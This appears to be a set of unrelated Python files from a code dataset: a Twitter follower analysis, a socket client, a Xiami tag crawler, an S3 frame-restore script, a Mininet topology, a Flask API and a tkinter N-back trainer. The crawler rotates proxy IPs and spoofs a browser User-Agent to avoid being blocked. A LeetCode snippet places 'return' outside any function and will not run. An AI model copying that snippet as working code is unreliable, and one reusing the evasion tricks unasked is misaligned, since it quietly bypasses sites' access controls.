(friends_dict, most_active_laymen, most_active_expert,\n most_active_celebrity, most_popular) #returning tuple\n\n\n# =============================================================================\n# return dictionary with highest value\n# =============================================================================\n\ndef get_highest(list_of_dicts):\n values = list(list_of_dicts.values())\n keys = list(list_of_dicts.keys())\n max_value = max(values)\n values_index = values.index(max_value)\n return {keys[values_index] : values[values_index]}\n\n# =============================================================================\n# first degree\n# =============================================================================\nnumber_requests = 0\n\nprint(\"Starting to find followers of \" + start_twitter_handle)\n\n(followers_WUSTLPoliSci,\n most_active_follower_WUSTL_laymen,\n most_active_follower_WUSTL_expert,\n most_active_follower_WUSTL_celebrity,\n most_popular_follower_WUSTL) = get_followers([start_twitter_handle])\n\nmost_active_follower_WUSTL = get_highest({**most_active_follower_WUSTL_laymen,\n **most_active_follower_WUSTL_expert,\n **most_active_follower_WUSTL_celebrity})\n\nprint('Most active follower of ' + start_twitter_handle + ': ' + str(most_active_follower_WUSTL))\n# Most active follower of WUSTLPoliSci: {'tubuann_only': 109517}\nprint('Most popular follower of ' + start_twitter_handle + ': ' + str(most_popular_follower_WUSTL))\n# Most popular follower of 
WUSTLPoliSci: {'BrendanNyhan': 81142}\n\nprint(\"Starting to find friends of \" + start_twitter_handle)\n\n(friends_WUSTLPoliSci,\n most_active_friend_WUSTL_laymen,\n most_active_friend_WUSTL_expert,\n most_active_friend_WUSTL_celebrity,\n most_popular_friend_WUSTL) = get_friends([start_twitter_handle])\n\nprint('Most active laymen friend of ' + start_twitter_handle + ': ' +\n      str(most_active_friend_WUSTL_laymen))\n# Most active laymen friend of WUSTLPoliSci: {'usmanfalalu1' : 1445}\nprint('Most active expert friend of ' + start_twitter_handle + ': ' +\n      str(most_active_friend_WUSTL_expert))\n# Most active expert friend of WUSTLPoliSci: {'prof_nokken' : 12562}\nprint('Most active celebrity friend of ' + start_twitter_handle + ': ' +\n      str(most_active_friend_WUSTL_celebrity))\n# Most active celebrity friend of WUSTLPoliSci: {'nytimes' : 406561}\nprint('Most popular friend of ' + start_twitter_handle + ': ' +\n      str(most_popular_friend_WUSTL))\n# Most popular friend of WUSTLPoliSci: {'BarackObama' : 122267221}\n\n# =============================================================================\n# second degree\n# =============================================================================\n\n# NB: only technically need most active\n\nprint(\"Starting to find followers of the followers of \" + start_twitter_handle)\n\n(second_degree_followers,\n second_degree_most_active_follower_laymen,\n second_degree_most_active_follower_expert,\n second_degree_most_active_follower_celebrity,\n second_degree_most_popular_follower) = get_followers(list(followers_WUSTLPoliSci.keys()))\n\nmost_active_follower = get_highest({**most_active_follower_WUSTL_laymen,\n                                    **most_active_follower_WUSTL_expert,\n                                    **second_degree_most_active_follower_laymen,\n                                    **second_degree_most_active_follower_expert})\n\nprint('Most active user of followers of ' + start_twitter_handle + ' and its followers: ' +\n      str(most_active_follower))\n#Most active user of followers of WUSTLPoliSci and its followers: {'Terryg1979': 254582}\n\nprint(\"Starting to find friends of friends of \" + start_twitter_handle)\n\n(second_degree_friends,\n second_degree_most_active_friend_laymen,\n second_degree_most_active_friend_expert,\n second_degree_most_active_friend_celebrity,\n second_degree_most_popular_friend) = get_friends(list(friends_WUSTLPoliSci.keys()))\n\nmost_active_friend = get_highest({**most_active_friend_WUSTL_laymen,\n                                  **most_active_friend_WUSTL_expert,\n                                  **second_degree_most_active_friend_laymen,\n                                  **second_degree_most_active_friend_expert})\n\nprint('Most active user of friends of ' + start_twitter_handle + ' and its friends: ' +\n      str(most_active_friend))\n# Most active user of friends of WUSTLPoliSci and its friends: {'MissAir': 148105}\n\nend = time.time()\n\nprint(\"Total run time (in seconds): \" + str(end - start))\n#Total run time (in seconds): 25452.960236549377\n","sub_path":"HW/HW3/aprati_hw3.py","file_name":"aprati_hw3.py","file_ext":"py","file_size_in_byte":14418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"418938063","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/2/22 21:43\n# @Author : Aries\n# @Site : \n# @File : IO多路复用Client.py\n# @Software: PyCharm\n\nimport socket\n\nsk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# sk.connect((\"127.0.0.1\",8003))\nsk.connect((\"127.0.0.1\", 8090)) # used for example 5\n\n# for example 1\n# while True:\n#     data = sk.recv(1024)\n#     print(str(data,\"utf-8\"))\n#     ipt = input(\">>>\").encode(\"utf8\")\n#     sk.sendall(ipt)\n\n# for example 2\nwhile True:\n    ipt = input(\">>>\").encode(\"utf8\")\n    sk.sendall(ipt)\n    data = sk.recv(1024)\n    print(str(data, \"utf-8\"))\n\n\n\n# ************************* client for example 4\n# import socket\n# client = socket.socket()\n#\n# client.connect(('localhost', 9000))\n#\n# while True:\n#     cmd = input('>>> ').strip()\n#     if len(cmd) == 0 : continue\n#     client.send(cmd.encode('utf-8'))\n#     data = client.recv(1024)\n#     print(data.decode())\n#\n# client.close()\n","sub_path":"PythonBase/week6/IO多路复用Client.py","file_name":"IO多路复用Client.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"224146999","text":"# coding=utf-8\n__author__ = 'arachis'\n\nimport csv\nfrom urllib.parse import quote\nimport random\nfrom time import sleep\n\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport requests\n\n\ndef doJob(id,yyt_song,yyt_artist):\n    yyt_song = yyt_song.lower()\n    yyt_artist = yyt_artist.lower()\n\n    \"\"\"Crawl the tag info of yyt_song by yyt_artist and return the result set\"\"\"\n    # print yyt_song,yyt_artist\n    url = u'http://www.xiami.com/search?key='+quote(str(yyt_song+\" \"+yyt_artist))\n    # add a proxy IP pool\n    ip_list=['112.253.22.142:80','112.253.22.141:80','220.194.199.184:80']\n    # use random.choice to pick one of the IPs # the argument is a dict {'scheme': 'proxy ip:port'}\n    proxies = {'http':random.choice(ip_list)}\n    # spoofed request header\n    header={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'}\n    print(url)\n    res = requests.request('POST',url,timeout=60,headers=header)\n\n    res = res.text.encode(res.encoding).decode('utf8')\n    soup = BeautifulSoup(res, 'html.parser')\n    music = soup.find(name='div', attrs={'class': 'search_result_box'})\n    # print music\n    track_list = music.find(name='table',attrs={\"class\":\"track_list\"})\n    # print track_list\n    if( not track_list ):# no data, return\n        return\n    results = track_list.find_all(name='tbody')\n    # print results\n    cur_first_song = \"\"\n    cur_first_artist = \"\"\n    cur_first_songid = \"\"\n    sign = 0 # match level\n    for result in results:\n        # print result\n        song_id = result.find(name=\"td\",attrs={\"class\":\"chkbox\"}).input[\"value\"]\n\n        #\n        song = result.find(name='a',attrs={'target':'_blank'})\n        song_name = song[\"title\"].lower()\n        # type(song_title)\n        artist = result.find(name=\"td\", attrs={\"class\": \"song_artist\"}).a\n        artist_name = artist[\"title\"].lower()\n\n        # custom matching rule: match the song first, then the artist\n        if song_name == yyt_song and artist_name == yyt_artist:\n            cur_first_song = song_name\n            cur_first_artist = artist_name\n            cur_first_songid = song_id\n            sign = 3\n            break\n        elif song_name == yyt_song and artist_name != yyt_artist and sign < 2:\n            cur_first_song = song_name\n            cur_first_artist = artist_name\n            cur_first_songid = song_id\n            sign = 2\n        elif (song_name.__contains__(yyt_song) or yyt_song.__contains__(song_name) ) and sign < 1:\n            cur_first_song = song_name\n            cur_first_artist = artist_name\n            cur_first_songid = song_id\n            sign = 1\n        else:\n            continue\n\n    # crawl all UGC tags of the matched song and write them to the csv file\n    url_moretags = \"http://www.xiami.com/song/moretags/id/\"+cur_first_songid\n    moretags_page = requests.request('POST',url_moretags,timeout=60,headers=header)\n    moretags_page = moretags_page.text.encode(moretags_page.encoding).decode('utf-8')\n    soup = BeautifulSoup(moretags_page, 'html.parser')\n    tag_cloud = soup.find(name='div', attrs={\"class\": \"tag_cloud\"})\n    song_tags = \"\"\n    if( tag_cloud ):\n        song_tags = tag_cloud.find_all(name=\"a\")\n    # print song_tags\n    tags = \"\"\n    split = \"@@@\"\n    for tag in song_tags:#http://cuiqingcai.com/1319.html\n        tags += str(tag.string).replace(\"@\",\"\") +split\n    tags = tags[:len(tags)-3]\n    record = [id,cur_first_song.replace(\",\",\"\"),cur_first_artist.replace(\",\",\"\"),cur_first_songid,tags.replace(\",\",\"\"),str(sign)]\n    print ('id:'+str(id)+u\",歌曲:\"+cur_first_song+u\",艺人:\"+cur_first_artist+u\",歌曲id: \"+cur_first_songid+u\",标签:\"+tags+\",匹配等级:\"+str(sign))\n    return record\n\n\ndef load_part(path):\n    csv = pd.read_csv(path,header=None,encoding='utf-8')\n    # print csv.values[0][0].decode('utf-8')\n    return csv.values\n\nif __name__ == \"__main__\":\n    # record = doJob(1,'movin','タカチャ')\n    jobID = 4\n    i = 0\n    path = 'data\\part-'\n    while( i< 337 ) :\n        if i % 10 == jobID:\n            # http://www.cnblogs.com/vamei/archive/2013/03/12/2954938.html\n            idx = '%05d' % i\n            part = load_part( path+idx )\n\n            with open('yyt标签爬虫'+idx+'.csv', 'w', newline='') as csvfile:\n                writer = csv.writer(csvfile, delimiter=',')\n                writer.writerow(['id','虾米歌曲', '虾米艺人', '虾米歌曲id', '虾米标签','匹配等级'])\n\n                for ll in part:\n                    id,yyt_song,yyt_artist = str(ll[0]),str(ll[1]),str(ll[2])\n                    try:\n                        record = doJob(id,yyt_song,yyt_artist)\n                        if( record ):\n                            writer.writerow(record)\n                        # csvfile.close()\n                        sleep(2)\n                    except Exception as e:\n                        if hasattr(e,\"code\"):\n                            print(e.code)\n                        if hasattr(e,\"reason\"):\n                            print(e.reason)\n                        print(\"Connection refused by the server..\")\n                        print(\"Let me sleep for 5 seconds\")\n                        sleep(5)\n                        continue\n            csvfile.close()\n        i += 1\n\n\n\n\n","sub_path":"learntoCrawler/crawler_xiami_py3.py","file_name":"crawler_xiami_py3.py","file_ext":"py","file_size_in_byte":5344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"298378652","text":"import imutils\nimport cv2\nfrom pgdb import connect\nimport boto3\nimport os\nfrom dotenv import load_dotenv\nimport datetime\nimport copy\nimport time\nimport uuid\nimport sys\nimport math\nimport pandas as pd\nfrom multiprocessing import Pool\n\n# Load environment variables\nload_dotenv(dotenv_path=\"../../video-annotation-tool/.env\")\nAWS_ACCESS_KEY_ID = os.getenv(\"AWS_ACCESS_KEY_ID\")\nAWS_SECRET_ACCESS_KEY = os.getenv(\"AWS_SECRET_ACCESS_KEY\")\nS3_BUCKET = os.getenv('AWS_S3_BUCKET_NAME')\ns3 = boto3.client('s3', aws_access_key_id=AWS_ACCESS_KEY_ID,\n                  aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\nS3_ANNOTATION_FOLDER = os.getenv(\"AWS_S3_BUCKET_ANNOTATIONS_FOLDER\")\nS3_VIDEO_FOLDER = os.getenv('AWS_S3_BUCKET_VIDEOS_FOLDER')\nS3_TRACKING_FOLDER = os.getenv(\"AWS_S3_BUCKET_TRACKING_FOLDER\")\n\n# connect to db\nDB_NAME = os.getenv(\"DB_NAME\")\nDB_HOST = os.getenv(\"DB_HOST\")\nDB_USER = os.getenv(\"DB_USER\")\nDB_PASSWORD = os.getenv(\"DB_PASSWORD\")\n\n\ndef getCapture(filename):\n    # grab video stream\n    url = s3.generate_presigned_url('get_object',\n                                    Params={'Bucket': S3_BUCKET,\n                                            'Key': S3_VIDEO_FOLDER + filename},\n                                    ExpiresIn=86400)\n    capture = cv2.VideoCapture(url)\n    return capture\n\n\ndef getVideoFrame(capture, frame_num):\n    capture.set(1, frame_num)\n    check, frame = capture.retrieve()\n    if (check is None or not check):\n        return None\n    return frame\n\n\ndef upload_image(frame, image):\n    temp_file = str(uuid.uuid4()) + \".png\"\n    cv2.imwrite(temp_file, frame)\n    s3.upload_file(temp_file, S3_BUCKET, S3_ANNOTATION_FOLDER +\n                   image, ExtraArgs={'ContentType': 'image/png'})\n    os.system('rm ' + temp_file)\n    return\n\n\ndef getAllImages(filename, rows):\n    print(f'Working on {filename}')\n    capture = getCapture(filename)\n    if capture is None:\n        print('Capture is broken')\n        return\n    
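The script above pulls single frames out of a presigned S3 video URL via getVideoFrame. A hedged standalone sketch of the underlying OpenCV frame-seek pattern follows; grab_frame and 'sample.mp4' are illustrative names, not part of the original file.
import cv2

def grab_frame(path, frame_num):
    # position the stream on the requested frame, then decode it
    cap = cv2.VideoCapture(path)
    cap.set(cv2.CAP_PROP_POS_FRAMES, frame_num)  # equivalent to cap.set(1, frame_num)
    ok, frame = cap.read()
    cap.release()
    return frame if ok else None

frame = grab_frame('sample.mp4', 100)  # None if the file or frame is unavailable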
length = rows.shape[0]\n for index, (_, row) in enumerate(rows.iterrows()):\n print(f'{filename} at {round(100*(index/length), 1)}%')\n frame_num = row.framenum\n if (pd.isna(frame_num)):\n frame_num = row.timeinvideo * 29.97002997003\n frame = getVideoFrame(capture, round(frame_num))\n if (frame is None):\n print(f'Something went wrong with annotation: {row.id}')\n print(row)\n continue\n upload_image(frame, row.image)\n capture.release()\n return\n\n\nif __name__ == \"__main__\":\n missingImages = pd.read_csv(sys.argv[1])\n with Pool() as p:\n p.starmap(getAllImages, map(\n lambda x: x, missingImages.groupby('filename')))\n","sub_path":"misc-scripts/restoreMissingImages.py","file_name":"restoreMissingImages.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"506634371","text":"from mininet.topo import Topo\nimport json\nimport pdb\n\n\nclass MyTopo( Topo ):\n \"\"\"test topology\"\"\"\n \n def __init__( self ):\n # Initialize topology\n Topo.__init__( self )\n\n self.N_LAYER = [2, 2, 2]\n self.N_HOSTS = 6\n\n pdb.set_trace()\n self.Switches = {}\n #create switches\n for l1 in range(1, self.N_LAYER[0] + 1):\n switch1 = self.addSwitch('s%d'%(l1),\n dpid = \"%03d%03d%03d\"%(l1,0,0))\n self.Switches['s%d'%(l1)] = switch1\n \n for l2 in range(1, self.N_LAYER[1] + 1):\n switch2 = self.addSwitch('s%d_%d'%(l1, l2),\n dpid = \"%03d%03d%03d\"%(l1,l2,0))\n self.Switches['s%d_%d'%(l1, l2)] = switch2\n \n self.addLink(switch1, switch2,\n port1 = l2,\n port2 = self.N_LAYER[2] + 1)\n \n for l3 in range(1, self.N_LAYER[2] + 1):\n switch3 = self.addSwitch('s%d_%d_%d'%(l1,l2,l3),\n dpid = \"%03d%03d%03d\"%(l1,l2,l3))\n self.Switches['s%d_%d_%d'%(l1,l2,l3)] = switch3\n self.addLink(switch2, switch3,\n port1 = l3,\n port2 = self.N_HOSTS + 1)\n\n self.addhosts(switch3, (l1,l2,l3))\n\n for i in range(1, self.N_LAYER[0]):\n self.addLink(self.Switches['s%d'%(i)],\n self.Switches['s%d'%(i + 1)],\n port1 = self.N_LAYER[1] + 1,\n port2 = self.N_LAYER[1] + 2)\n \n self.create_config()\n\n def addhosts(self, switch, index):\n l1, l2, l3 = index\n self.Hosts = {}\n for i in range(1, self.N_HOSTS+1):\n i_tuple = (l1, l2, l3, i)\n host = self.addHost('h%d_%d_%d_%d'%i_tuple,\n ip=\"%d.%d.%d.%d\"%i_tuple,\n mac=\"00:00:%02x:%02x:%02x:%02x\"%i_tuple)\n\n self.Hosts['h%d_%d_%d_%d'%i_tuple] = host\n self.addLink(switch, host, port1 = i)\n\n def init_custom_switch(self, c, dpid):\n c[\"switches\"][str(int(dpid, base=16))] = {}\n \n switch = c[\"switches\"][str(int(dpid, base=16))]\n switch[\"real\"] = str(int(dpid, base = 16))\n switch[\"rtov\"] = {}\n switch[\"port_type\"] = {}\n\n return switch\n \n def config_l12(self, c, dpid, layer):\n if layer == 0:\n extra = 2\n else:\n extra = 1\n \n switch = self.init_custom_switch(c, dpid)\n for port in range(1, self.N_LAYER[layer+1] + 1 + extra):\n switch[\"rtov\"][str(port)] = str(port)\n switch[\"port_type\"][str(port)] = 1\n\n def config_l3(self, c1, c2, dpid):\n switch1 = self.init_custom_switch(c1, dpid)\n switch2 = self.init_custom_switch(c2, dpid)\n\n for port in range(1, self.N_HOSTS/2 + 1):\n switch1[\"rtov\"][str(port)] = str(port)\n switch1[\"port_type\"][str(port)] = 0\n\n for port in range(self.N_HOSTS/2 + 1, self.N_HOSTS + 1):\n switch2[\"rtov\"][str(port)] = int(port - self.N_HOSTS/2)\n switch2[\"port_type\"][str(port)] = 0\n\n switch1[\"rtov\"][str(self.N_HOSTS+1)] = str(self.N_HOSTS/2 + 1)\n switch1[\"port_type\"][str(self.N_HOSTS+1)] = 1\n 
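For reference, the dpid strings used throughout this topology pack the three layer indices into nine digits with "%03d%03d%03d". A small sketch of that encoding follows; the decode_dpid helper is hypothetical and not part of the original file.
def encode_dpid(l1, l2, l3):
    # three zero-padded 3-digit fields, matching the topology's format string
    return "%03d%03d%03d" % (l1, l2, l3)

def decode_dpid(dpid):
    # hypothetical inverse helper, for illustration only
    return int(dpid[0:3]), int(dpid[3:6]), int(dpid[6:9])

assert encode_dpid(2, 1, 0) == "002001000"
assert decode_dpid("002001000") == (2, 1, 0)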
switch2[\"rtov\"][str(self.N_HOSTS+1)] = str(self.N_HOSTS/2 + 1)\n switch2[\"port_type\"][str(self.N_HOSTS+1)] = 1\n\n \n def create_config(self):\n config = {}\n \n config[\"2C:1B:CD:B6:21:D6:1F:8A:A7:21:4B:96:FC:A8:D0:D6:33:63:CA:C5\"] = {}\n c1 = config[\"2C:1B:CD:B6:21:D6:1F:8A:A7:21:4B:96:FC:A8:D0:D6:33:63:CA:C5\"]\n c1[\"type\"] = \"common\"\n c1[\"vlan_vid\"] = 1\n c1[\"switches\"] = {}\n\n config[\"FE:DD:44:D7:C2:D9:58:B5:6F:EF:51:C7:4E:2F:AD:AA:B9:1B:A4:0B\"] = {}\n c2 = config[\"FE:DD:44:D7:C2:D9:58:B5:6F:EF:51:C7:4E:2F:AD:AA:B9:1B:A4:0B\"]\n c2[\"type\"] = \"common\"\n c2[\"vlan_vid\"] = 2\n c2[\"switches\"] = {}\n\n for l1 in range(1, self.N_LAYER[0]+1):\n dpid = \"%03d%03d%03d\"%(l1,0,0)\n self.config_l12(c1, dpid, 0)\n self.config_l12(c2, dpid, 0)\n \n for l2 in range(1, self.N_LAYER[1]+1):\n dpid = \"%03d%03d%03d\"%(l1,l2,0)\n self.config_l12(c1, dpid, 1)\n self.config_l12(c2, dpid, 1)\n \n for l3 in range(1, self.N_LAYER[2]+1):\n dpid = \"%03d%03d%03d\"%(l1,l2,l3)\n self.config_l3(c1, c2, dpid)\n\n f = open(\"test_config.json\", \"w\")\n json.dump(config, f, indent = 4)\n\ntopos = { 'test_topo_100': ( lambda: MyTopo() ) }\n","sub_path":"evaluation/test_vlan.py","file_name":"test_vlan.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"397133945","text":"from flask import Flask,jsonify,request\n\nfrom services import get_bullying_prediction, handle_train\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/train-model', methods=['GET'])\ndef train_model():\n\treturn jsonify({\"status\":handle_train()})\n\n\n@app.route('/check-bullying', methods=['POST'])\ndef check_bullying():\n\tdata = request.json\n\treturn jsonify({\"result\":get_bullying_prediction(data[\"data\"])})\n\nif __name__ == '__main__':\n app.run(host='192.168.1.10', port=8080)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"23169037","text":"# 时间复杂度O(n^3)\r\n# 解题思想:因为题目限定x和y都在0-100的范围内,在每次输入的时候就对矩形内的元素进行染色\r\n# 最后在10000个元素中进行遍历,找到染色的元素则面积增加。\r\n# 进一步优化可以定义MaxX和MaxY来限定遍历的边界,减少占用的空间。\r\nN = int(input()) # 输入矩形的个数\r\nValue = [['White' for i in range(101)] for i in range(101)] # 特别需要注意创建二维数组的方法\r\nfor i in range(N):\r\n X1, Y1, X2, Y2 = map(int, input().split()) # 一行输入矩形四个坐标的值\r\n for x in range(X1, X2): # 遍历矩形的X坐标\r\n for y in range(Y1, Y2): # 遍历矩形的Y坐标\r\n Value[x][y] = 'Blue' # 将矩形内的元素染色\r\n\r\nArea = 0 # 面积\r\nfor i in range(101): # 遍历完整范围内的Y坐标\r\n for j in range(101): # 遍历完整范围内的X坐标\r\n if Value[i][j] == 'Blue': # 如果这个坐标被染色\r\n Area += 1\r\nprint(Area)\r\n","sub_path":"_20140902.py","file_name":"_20140902.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"133895037","text":"import numpy as np\n\n\na = np.zeros((70))\nstr = \"abccccdd\"\nfor i in range(len(str)):\n a[ord(str[i]) - 65] += 1\n#print(a)\nflag = False\nfor i in range(70):\n if a[i] % 2 != 0:\n a[i] -= 1\n flag = True\nif flag == False:\n return sum(a)\nelse:\n return sum(a) + 1","sub_path":"LeetCode/409/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"559229999","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 14 20:55:38 2018\r\n\r\n@author: 
Ryan\r\n\"\"\"\r\n\r\nimport tkinter, tkinter.simpledialog, Session_Settings\r\n\r\n\r\n \r\nclass n_back_session_Frame(tkinter.Frame):\r\n \"\"\"A frame to contain the information and grid screen for the N back training session.\r\n Is a separate frame so that another frame can contain the configuration screen.\r\n \"\"\" \r\n \r\n def __init__(self,master,*args, **kwargs):\r\n tkinter.Frame.__init__(self,master,*args,**kwargs)\r\n \r\n self.master = master\r\n#set properties of this frame\r\n self['background'] = 'light grey'\r\n self['borderwidth'] = 2\r\n self['relief'] = 'sunken'\r\n self[\"height\"] = 802\r\n self[\"width\"] = 802\r\n self.grid(row=0, column=0)\r\n self.grid_propagate(False) \r\n \r\n #create child elements of the frame\r\n self.left_Bar_Frame = self.create_Left_Bar_Frame()\r\n self.right_Grid_Canvas = self.create_Right_Grid_Space()\r\n self.top_Header_Canvas = self.create_Top_Header_Score_Canvas()\r\n self.bottom_control_Display_Frame = self.create_Bottom_Control_Display_Frame()\r\n \r\n def create_Left_Bar_Frame(self):\r\n \"\"\"\r\n Create the frame that is to contain the current score, average N back, points per correct answer,\r\n speed or delay per displayed memory symbol, whether the audio symbols are to be numbers or letters, and the visual grid size.\r\n Along with any other parameters or meta level game controls.\r\n ##########\r\n OUTPUTS:\r\n left_Bar_Frame = the frame to contain all meta level game paramters. \r\n \"\"\"\r\n #creater child(slave) widgets of the main Frame \r\n left_Bar_Frame = tkinter.Frame(self)\r\n #set the left bar frame to be in row 0 column 0, i.e to the left of the GUI\r\n left_Bar_Frame.grid(row= 0, column= 0, rowspan = 3)\r\n \r\n left_Bar_Frame['background'] = 'light grey'\r\n left_Bar_Frame['borderwidth'] = 2\r\n left_Bar_Frame['relief'] = 'ridge'\r\n left_Bar_Frame[\"height\"] = 800\r\n left_Bar_Frame[\"width\"] = 200\r\n left_Bar_Frame.grid_propagate(False)\r\n \r\n return left_Bar_Frame\r\n \r\n def create_Right_Grid_Space(self):\r\n \"\"\"\r\n Create the canvas object that is to contain the dual N back display grid\r\n ##########\r\n INPUTS: \r\n main_Frame = an instante of the frame that this second frame is to be the child widget of.\r\n OUTPUTS:\r\n right_Grid_Frame = the frame to contain the dual N back squares. \r\n \"\"\"\r\n \r\n #creater child(slave) widgets of the main Frame \r\n right_Grid_Canvas = tkinter.Canvas(self)\r\n #set the left bar frame to be in row 0 column 0, i.e to the left of the GUI\r\n right_Grid_Canvas.grid(row=1, column=1)\r\n \r\n right_Grid_Canvas['background'] = 'white'\r\n right_Grid_Canvas['borderwidth'] = 0\r\n right_Grid_Canvas['relief'] = 'ridge'\r\n right_Grid_Canvas[\"height\"] = 600\r\n right_Grid_Canvas[\"width\"] = 600\r\n right_Grid_Canvas.grid_propagate(False)\r\n \r\n return right_Grid_Canvas\r\n \r\n def create_Top_Header_Score_Canvas(self):\r\n \"\"\"\r\n Create the frame that is to contain the score track header above the dual N back grid\r\n ##########\r\n INPUTS: \r\n main_Frame = an instante of the frame that this second frame is to be the child widget of.\r\n OUTPUTS:\r\n top_Header_Score_Frame = the frame to contain the dual N back squares. 
\r\n \"\"\"\r\n #creater child(slave) widgets of the main Frame \r\n top_Header_Score_Canvas = tkinter.Canvas(self)\r\n #set the left bar frame to be in row 0 column 0, i.e to the left of the GUI\r\n top_Header_Score_Canvas.grid(row=0, column=1)\r\n \r\n top_Header_Score_Canvas ['background']='light blue'\r\n top_Header_Score_Canvas ['borderwidth'] = 0\r\n top_Header_Score_Canvas ['relief'] = 'sunken'\r\n top_Header_Score_Canvas [\"height\"] = 100\r\n top_Header_Score_Canvas [\"width\"] = 600\r\n top_Header_Score_Canvas.grid_propagate(False)\r\n \r\n return top_Header_Score_Canvas \r\n \r\n def create_Bottom_Control_Display_Frame(self):\r\n \"\"\"\r\n Create the frame that is to contain the instructions\r\n ##########\r\n INPUTS: \r\n main_Frame = an instante of the frame that this second frame is to be the child widget of.\r\n OUTPUTS:\r\n bottom_Control_Display_Frame = the frame to contain the instructions. \r\n \"\"\"\r\n #creater child(slave) widgets of the main Frame \r\n bottom_Control_Display_Frame = tkinter.Frame(self)\r\n #set the left bar frame to be in row 0 column 0, i.e to the left of the GUI\r\n bottom_Control_Display_Frame.grid(row=2, column=1)\r\n \r\n bottom_Control_Display_Frame['background'] = 'light green'\r\n bottom_Control_Display_Frame['borderwidth'] = 1\r\n bottom_Control_Display_Frame['relief'] = 'flat'\r\n bottom_Control_Display_Frame[\"height\"] = 100\r\n bottom_Control_Display_Frame[\"width\"] = 600\r\n bottom_Control_Display_Frame.grid_propagate(False)\r\n \r\n return bottom_Control_Display_Frame \r\n \r\nclass Configuration_Frame(tkinter.Frame):\r\n \"\"\"Create a frame to contain the information and grid screen for the configuration screen.\r\n Is a separate frame so that another frame can contain the N back training session screen.\r\n \"\"\" \r\n \r\n def __init__(self,master,*args, **kwargs):\r\n tkinter.Frame.__init__(self,master,*args,**kwargs)\r\n \r\n self.master = master\r\n\r\n self['background'] = 'light blue'\r\n self['borderwidth'] = 2\r\n self['relief'] = 'raised'\r\n self[\"height\"] = 802\r\n self[\"width\"] = 802\r\n self.grid(row=0, column=0) \r\n self.grid_propagate(False)\r\n \r\n self.__set_up_input_error_label()\r\n self.__set_up_speed_per_n_entry_widget()\r\n self.__set_up_letters_over_numbers_widget()\r\n self.__set_up_rounds_per_n_back_session_widget()\r\n self.__set_up_events_per_round_widget()\r\n self.__set_up_n_back_grid_size_widget()\r\n self.__set_up_instructions_label()\r\n\r\n def __set_up_input_error_label(self):\r\n self.__error_label = tkinter.Label(self, text=\" \", background = self['background'])\r\n self.__error_label.grid(row=7, column = 0, columnspan=2)\r\n \r\n def __set_up_instructions_label(self):\r\n instructions_label = tkinter.Label(self, text='For new configuration settings to be accepted,\\n either press enter while still in the textbox \\n or change focus out of the textbox.', background=self['background'])\r\n instructions_label.grid(row=9, column = 0, columnspan=2)\r\n \r\n def __validate_float(self, text_input):\r\n try:\r\n float(text_input)\r\n self.__error_label.config(text=\"\")\r\n self.__error_label.config(background = self['background'])\r\n return True\r\n except:\r\n self.__error_label.config(text=\"Input Value must be a number, integer or decimal, to be valid.\")\r\n self.__error_label.config(background = 'red')\r\n return False\r\n \r\n def __validate_int(self, text_input):\r\n try:\r\n int(text_input)\r\n self.__error_label.config(text=\"\")\r\n self.__error_label.config(background = 
self['background'])\r\n return True\r\n except:\r\n self.__error_label.config(text=\"Input Value must be an integer to be valid.\")\r\n self.__error_label.config(background = 'red')\r\n return False\r\n \r\n def update_all_configuration_settings(self):\r\n \"\"\"to be ran externally to update all settings.\r\n this is for when navigating out of the configuration screen, as normally a\r\n focusout or enter keypress is needed to save the settings, but destroying the screen by \r\n navigating back to the main n back screen doesnt do this. \r\n \"\"\"\r\n self.__update_speed_per_n_function()\r\n self.__update_letters_over_numbers_function()\r\n self.__update_rounds_per_n_back_session_function()\r\n self.__update_events_per_round_function()\r\n self.__update_n_back_grid_size_function()\r\n \r\n def __update_speed_per_n_function(self,*args,**kwargs): \r\n \"\"\"This and the other update setting function have to take *args and **kwargs as they can be triggered by tkiner\r\n events which pass keypressded and mouse coords, etc as arguments and we dont want them but must still be able to take them.\r\n \"\"\"\r\n self.master.master.session_settings.speed_per_n = self.__speed_per_n_entry_StringVar.get()\r\n \r\n def __set_up_speed_per_n_entry_widget(self):\r\n \"\"\"\r\n Set up a label and entry box for the speed per n entry box.\r\n Uses a StringVar, as only this subclass of the variable can be passed to the Tcl tkinter widget as a textvariable, to store the entry in a text entrybox.\r\n The enter button event is bound to a lambda function that called update_speed_per_n to update the speed per n setting in self.master.master.session_settings.speed_per_n,\r\n which is a property and thus triggers the input checking in the session settings class.\r\n \"\"\"\r\n speed_per_n_entry_label = tkinter.Label(self, text=\"Time for each N back event in seconds : \", background = self['background'])\r\n speed_per_n_entry_label.grid(row=0, column=0)\r\n\r\n self.__speed_per_n_entry_StringVar = tkinter.StringVar(value=self.master.master.session_settings.speed_per_n)\r\n \r\n validate_speed_per_n = self.register(self.__validate_float)\r\n \r\n speed_per_n_entry = tkinter.Entry(self, textvariable = self.__speed_per_n_entry_StringVar, validate='all', validatecommand=(validate_speed_per_n, '%P' )) #'%P' text if validation passed\r\n speed_per_n_entry.grid(row=0, 